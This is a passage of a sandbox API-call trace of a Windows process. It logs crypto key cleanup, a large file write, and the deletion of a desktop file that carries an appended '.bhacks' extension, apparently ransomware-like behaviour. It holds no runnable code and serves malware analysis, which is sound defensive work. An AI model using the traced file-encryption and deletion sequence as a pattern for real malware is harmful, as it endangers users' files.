wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.182] WriteFile (in: hFile=0x294, lpBuffer=0x2a9fd98*, nNumberOfBytesToWrite=0x4b88, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a9fd98*, lpNumberOfBytesWritten=0x8cf5e4*=0x4b88, lpOverlapped=0x0) returned 1 [0090.183] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.183] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.183] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0090.183] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.183] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0090.183] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.183] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.183] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.184] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0090.184] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.184] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0090.184] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0090.184] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9be0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0090.184] CryptDestroyKey (hKey=0x9a3d00) returned 1 [0090.184] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.184] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.184] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.184] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.184] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.184] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.184] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.184] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.184] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.184] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.184] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.184] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.184] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.184] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.184] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.185] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0090.185] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.185] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0090.185] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0090.185] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.185] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.185] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.185] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.185] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.185] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.185] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.185] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.185] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.185] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.185] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.185] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.185] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.185] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.185] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.185] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.185] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.185] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.185] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.185] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.185] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.186] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.186] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.186] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.186] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.186] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.186] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.186] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.186] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.186] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.186] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.186] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.186] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f00, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0090.186] CryptReleaseContext (hProv=0x9961a8, dwFlags=0x0) returned 1 [0090.186] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.186] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.186] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.186] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.186] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.186] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.186] FreeLibrary (hLibModule=0x76390000) returned 1 [0090.186] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.187] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.187] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.187] CloseHandle (hObject=0x2c4) returned 1 [0090.188] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.188] CloseHandle (hObject=0x294) returned 1 [0090.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.191] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.191] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.191] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6220 [0090.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0090.191] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/DqUNIlu.gif.bhacks", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif.bhacks", lpFilePart=0x8cedf4*="DqUNIlu.gif.bhacks") returned 0x2a [0090.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0090.191] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\dqunilu.gif.bhacks")) returned 0x20 [0090.191] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif.bhacks", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23825ba3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23825ba3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23b46f90, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="DqUNIlu.gif.bhacks", cAlternateFileName="DQUNIL~1.BHA")) returned 0x9a3d00 [0090.192] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\dqunilu.gif.bhacks")) returned 1 [0090.193] FindNextFileW (in: hFindFile=0x9a3d00, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23825ba3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23825ba3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23b46f90, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="DqUNIlu.gif.bhacks", cAlternateFileName="DQUNIL~1.BHA")) returned 0 [0090.193] FindClose (in: hFindFile=0x9a3d00 | out: hFindFile=0x9a3d00) returned 1 [0090.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75330 | out: hHeap=0x2af0000) returned 1 [0090.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0090.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0090.193] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0090.193] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0090.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0090.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0090.194] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6648 [0090.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0090.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0090.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75510 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6648 | out: hHeap=0x2af0000) returned 1 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0090.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0090.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0090.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0090.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0090.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5f7e0 [0090.195] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/DqUNIlu.gif.bhacks", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif.bhacks", lpFilePart=0x8cf650*="DqUNIlu.gif.bhacks") returned 0x2a [0090.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f7e0 | out: hHeap=0x2af0000) returned 1 [0090.195] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\dqunilu.gif.bhacks")) returned 0xffffffff [0090.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75510 | out: hHeap=0x2af0000) returned 1 [0090.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0090.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.195] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0090.195] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.195] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) 